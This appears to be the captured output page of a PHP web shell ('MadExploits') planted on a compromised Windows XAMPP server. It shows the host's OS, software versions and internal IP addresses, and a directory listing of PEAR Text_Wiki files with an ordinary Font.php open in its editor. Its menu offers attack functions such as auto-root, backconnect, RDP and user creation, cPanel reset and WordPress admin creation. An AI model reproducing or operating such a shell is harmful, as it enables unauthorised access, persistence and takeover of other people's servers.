Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
Text /
Wiki /
Render /
Latex /
[ HOME SHELL ]
Name
Size
Permission
Action
Anchor.php
585
B
-rw-rw-rw-
Blockquote.php
738
B
-rw-rw-rw-
Bold.php
575
B
-rw-rw-rw-
Box.php
1.35
KB
-rw-rw-rw-
Break.php
435
B
-rw-rw-rw-
Center.php
714
B
-rw-rw-rw-
Code.php
511
B
-rw-rw-rw-
Colortext.php
1.11
KB
-rw-rw-rw-
Deflist.php
1.09
KB
-rw-rw-rw-
Delimiter.php
558
B
-rw-rw-rw-
Embed.php
451
B
-rw-rw-rw-
Emphasis.php
579
B
-rw-rw-rw-
Font.php
1.96
KB
-rw-rw-rw-
Freelink.php
171
B
-rw-rw-rw-
Function.php
442
B
-rw-rw-rw-
Heading.php
784
B
-rw-rw-rw-
Horiz.php
465
B
-rw-rw-rw-
Html.php
455
B
-rw-rw-rw-
Image.php
1.75
KB
-rw-rw-rw-
Include.php
130
B
-rw-rw-rw-
Interwiki.php
1.59
KB
-rw-rw-rw-
Italic.php
577
B
-rw-rw-rw-
List.php
2.2
KB
-rw-rw-rw-
Newline.php
157
B
-rw-rw-rw-
Page.php
1.22
KB
-rw-rw-rw-
Paragraph.php
596
B
-rw-rw-rw-
Phplookup.php
755
B
-rw-rw-rw-
Plugin.php
1.3
KB
-rw-rw-rw-
Prefilter.php
2.23
KB
-rw-rw-rw-
Preformatted.php
1.29
KB
-rw-rw-rw-
Raw.php
447
B
-rw-rw-rw-
Revise.php
776
B
-rw-rw-rw-
Smiley.php
1.26
KB
-rw-rw-rw-
Specialchar.php
1.64
KB
-rw-rw-rw-
Strong.php
582
B
-rw-rw-rw-
Subscript.php
1.35
KB
-rw-rw-rw-
Superscript.php
627
B
-rw-rw-rw-
Table.php
2.41
KB
-rw-rw-rw-
Tighten.php
131
B
-rw-rw-rw-
Titlebar.php
1.38
KB
-rw-rw-rw-
Toc.php
546
B
-rw-rw-rw-
Tt.php
578
B
-rw-rw-rw-
Underline.php
588
B
-rw-rw-rw-
Url.php
894
B
-rw-rw-rw-
Wikilink.php
1.66
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Font.php
<?php // vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: /** * BBCode: extra Font rules renderer to size the text * * PHP versions 4 and 5 * * @category Text * @package Text_Wiki * @author Bertrand Gugger <bertrand@toggg.com> * @copyright 2005 bertrand Gugger * @license http://www.gnu.org/copyleft/lesser.html LGPL License 2.1 * @version CVS: $Id: Font.php 209123 2006-03-11 11:14:23Z toggg $ * @link http://pear.php.net/package/Text_Wiki */ /** * Font rule render class (used for BBCode) * * @category Text * @package Text_Wiki * @author Bertrand Gugger <bertrand@toggg.com> * @copyright 2005 bertrand Gugger * @license http://www.gnu.org/copyleft/lesser.html LGPL License 2.1 * @version Release: @package_version@ * @link http://pear.php.net/package/Text_Wiki * @see Text_Wiki::Text_Wiki_Render() */ class Text_Wiki_Render_Latex_Font extends Text_Wiki_Render { /** * A table to translate the sizes * * @access public * @var array */ var $sizes = array( 'tiny' => 5, 'scriptsize' => 7, 'footnotesize' => 8, 'small' => 9, 'normalsize' => 11, 'large' => 13, 'Large' => 16, 'LARGE' => 19, 'huge' => 22, 'Huge' => 9999); /** * Renders a token into text matching the requested format. * process the font size option * * @access public * @param array $options The "options" portion of the token (second element). * @return string The text rendered from the token options. */ function token($options) { if ($options['type'] == 'start') { foreach ($this->sizes as $key => $lim) { if ($options['size'] < $lim) { break; } } return '\{' . $key . '}{'; } if ($options['type'] == 'end') { return '}'; } } } ?>
Close